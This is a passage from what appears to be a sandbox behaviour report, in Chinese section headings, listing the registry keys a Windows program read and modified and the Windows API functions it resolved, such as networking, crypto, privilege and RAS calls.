- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASAPI32\MaxFileSize
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASAPI32\FileDirectory
- HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
- HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows\CEIPEnable
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Winsock\Parameters
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winsock\Parameters\Transports
- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip6\Parameters\Winsock
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TCPIP6\Parameters\Winsock\Mapping
- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Winsock\Mapping
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Winsock\Setup Migration\Providers
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winsock\Setup Migration\Providers\Tcpip
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winsock\Setup Migration\Providers\Tcpip\WinSock 2.0 Provider ID
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Winsock\MinSockaddrLength
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Winsock\MaxSockaddrLength
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Winsock\UseDelayedAcceptance
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Winsock\HelperDllName
- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DnsCache\Parameters
- HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
- HKEY_CURRENT_USER\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
- HKEY_CURRENT_USER\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
- HKEY_CURRENT_USER\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
- HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
- HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
- HKEY_CURRENT_USER\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
- HKEY_CURRENT_USER\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
- HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6AFECCC0-D559-44BB-ABA7-DFF571F2336A}
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
- HKEY_USERS\S-1-5-21-2280033686-3172497658-3481507381-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2280033686-3172497658-3481507381-1000
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2280033686-3172497658-3481507381-1000\ProfileImagePath
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6AFECCC0-D559-44BB-ABA7-DFF571F2336A}\WpadDecisionReason
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6AFECCC0-D559-44BB-ABA7-DFF571F2336A}\WpadDecisionTime
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6AFECCC0-D559-44BB-ABA7-DFF571F2336A}\WpadDecision
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6AFECCC0-D559-44BB-ABA7-DFF571F2336A}\WpadNetworkName
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6AFECCC0-D559-44BB-ABA7-DFF571F2336A}\52-54-00-72-64-78
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-72-64-78
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-72-64-78\WpadDecisionReason
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-72-64-78\WpadDecisionTime
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-72-64-78\WpadDecision
- HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
读取的注册表键
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000804
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\a
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane1
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane2
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane3
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane4
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane5
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane6
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane7
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane8
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane9
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane10
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane11
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane12
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane13
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane14
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane15
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane16
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\ProgID\(Default)
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\(Default)
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32\InprocServer32
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32\(Default)
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32\ThreadingModel
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaxSxSHashCount
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave1
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave2
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave3
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave4
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave5
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave6
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave7
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave8
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave9
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi1
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi2
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi3
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi4
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi5
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi6
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi7
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi8
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi9
- HKEY_CURRENT_USER\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm\wheel
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\EnableFileTracing
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\FileTracingMask
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\EnableConsoleTracing
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\ConsoleTracingMask
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\MaxFileSize
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\FileDirectory
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASAPI32\EnableFileTracing
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASAPI32\FileTracingMask
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASAPI32\EnableConsoleTracing
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASAPI32\ConsoleTracingMask
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASAPI32\MaxFileSize
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASAPI32\FileDirectory
- HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows\CEIPEnable
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winsock\Parameters\Transports
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TCPIP6\Parameters\Winsock\Mapping
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Winsock\Mapping
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winsock\Setup Migration\Providers\Tcpip\WinSock 2.0 Provider ID
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Winsock\MinSockaddrLength
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Winsock\MaxSockaddrLength
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Winsock\UseDelayedAcceptance
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Winsock\HelperDllName
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2280033686-3172497658-3481507381-1000\ProfileImagePath
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
修改的注册表键
- HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\msdtcws_RASMANCS
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\EnableFileTracing
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\EnableConsoleTracing
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\FileTracingMask
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\ConsoleTracingMask
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\MaxFileSize
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\FileDirectory
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6AFECCC0-D559-44BB-ABA7-DFF571F2336A}
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6AFECCC0-D559-44BB-ABA7-DFF571F2336A}\WpadDecisionReason
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6AFECCC0-D559-44BB-ABA7-DFF571F2336A}\WpadDecisionTime
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6AFECCC0-D559-44BB-ABA7-DFF571F2336A}\WpadDecision
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6AFECCC0-D559-44BB-ABA7-DFF571F2336A}\WpadNetworkName
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6AFECCC0-D559-44BB-ABA7-DFF571F2336A}\52-54-00-72-64-78
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-72-64-78
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-72-64-78\WpadDecisionReason
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-72-64-78\WpadDecisionTime
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-72-64-78\WpadDecision
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
删除的注册表键
无信息
API解析
- kernel32.dll.IsProcessorFeaturePresent
- cryptbase.dll.SystemFunction036
- dwmapi.dll.DwmIsCompositionEnabled
- advapi32.dll.CryptAcquireContextA
- cryptsp.dll.CryptAcquireContextA
- advapi32.dll.CryptCreateHash
- cryptsp.dll.CryptCreateHash
- advapi32.dll.CryptHashData
- cryptsp.dll.CryptHashData
- advapi32.dll.CryptGetHashParam
- cryptsp.dll.CryptGetHashParam
- advapi32.dll.CryptDestroyHash
- cryptsp.dll.CryptDestroyHash
- advapi32.dll.CryptReleaseContext
- cryptsp.dll.CryptReleaseContext
- kernel32.dll.lstrcpyn
- wininet.dll.InternetOpenA
- kernel32.dll.CreateThread
- kernel32.dll.RtlMoveMemory
- kernel32.dll.CloseHandle
- comctl32.dll.RegisterClassNameW
- uxtheme.dll.OpenThemeData
- uxtheme.dll.GetThemeBool
- imm32.dll.ImmIsIME
- gdi32.dll.GetLayout
- gdi32.dll.GdiRealizationInfo
- gdi32.dll.FontIsLinked
- advapi32.dll.RegOpenKeyExW
- advapi32.dll.RegQueryInfoKeyW
- gdi32.dll.GetTextFaceAliasW
- advapi32.dll.RegEnumValueW
- advapi32.dll.RegCloseKey
- advapi32.dll.RegQueryValueExW
- advapi32.dll.RegQueryValueExA
- advapi32.dll.RegEnumKeyExW
- gdi32.dll.GetTextExtentExPointWPri
- uxtheme.dll.EnableThemeDialogTexture
- ole32.dll.CLSIDFromOle1Class
- clbcatq.dll.GetCatalogObject
- clbcatq.dll.GetCatalogObject2
- ieframe.dll.DllGetClassObject
- ieframe.dll.DllCanUnloadNow
- urlmon.dll.#414
- dciman32.dll.DCIOpenProvider
- dciman32.dll.DCICloseProvider
- dciman32.dll.DCICreatePrimary
- dciman32.dll.DCIEndAccess
- dciman32.dll.DCIBeginAccess
- dciman32.dll.DCIDestroy
- sechost.dll.OpenSCManagerW
- sechost.dll.OpenServiceW
- sechost.dll.QueryServiceStatus
- sechost.dll.CloseServiceHandle
- rpcrt4.dll.RpcStringBindingComposeW
- rpcrt4.dll.RpcBindingFromStringBindingW
- rpcrt4.dll.RpcStringFreeW
- mmdevapi.dll.#3
- rpcrt4.dll.NdrClientCall2
- kernel32.dll.GetLogicalDriveStringsA
- kernel32.dll.GetCurrentProcess
- advapi32.dll.OpenProcessToken
- advapi32.dll.LookupPrivilegeValueA
- advapi32.dll.AdjustTokenPrivileges
- uxtheme.dll.CloseThemeData
- wininet.dll.InternetCloseHandle
- advapi32.dll.UnregisterTraceGuids
- rpcrt4.dll.RpcBindingFree
- kernel32.dll.CreateMutexA
- kernel32.dll.WaitForSingleObject
- wininet.dll.InternetConnectA
- wininet.dll.HttpOpenRequestA
- wininet.dll.HttpSendRequestA
- rasapi32.dll.RasConnectionNotificationW
- rasman.dll.RasPortClearStatistics
- rasman.dll.RasBundleClearStatistics
- rasman.dll.RasBundleClearStatisticsEx
- rasman.dll.RasDeviceEnum
- rasman.dll.RasDeviceGetInfo
- rasman.dll.RasFreeBuffer
- rasman.dll.RasGetBuffer
- rasman.dll.RasGetInfo
- rasman.dll.RasGetDialMachineEventContext
- rasman.dll.RasSetDialMachineEventHandle
- rasman.dll.RasGetNdiswanDriverCaps
- rasman.dll.RasInitialize
- rasman.dll.RasInitializeNoWait
- rasman.dll.RasPortCancelReceive
- rasman.dll.RasPortEnum
- rasman.dll.RasPortGetInfo
- rasman.dll.RasPortGetFramingEx
- rasman.dll.RasPortGetStatistics
- rasman.dll.RasBundleGetStatistics
- rasman.dll.RasPortGetStatisticsEx
- rasman.dll.RasBundleGetStatisticsEx
- rasman.dll.RasPortReceive
- rasman.dll.RasPortReceiveEx
- rasman.dll.RasPortSend
- rasman.dll.RasPortGetBundle
- rasman.dll.RasGetDevConfig
- rasman.dll.RasGetDevConfigEx
- rasman.dll.RasSetDevConfig
- rasman.dll.RasPortClose
- rasman.dll.RasPortListen
- rasman.dll.RasPortConnectComplete
- rasman.dll.RasPortDisconnect
- rasman.dll.RasRequestNotification
- rasman.dll.RasPortEnumProtocols
- rasman.dll.RasPortSetFraming
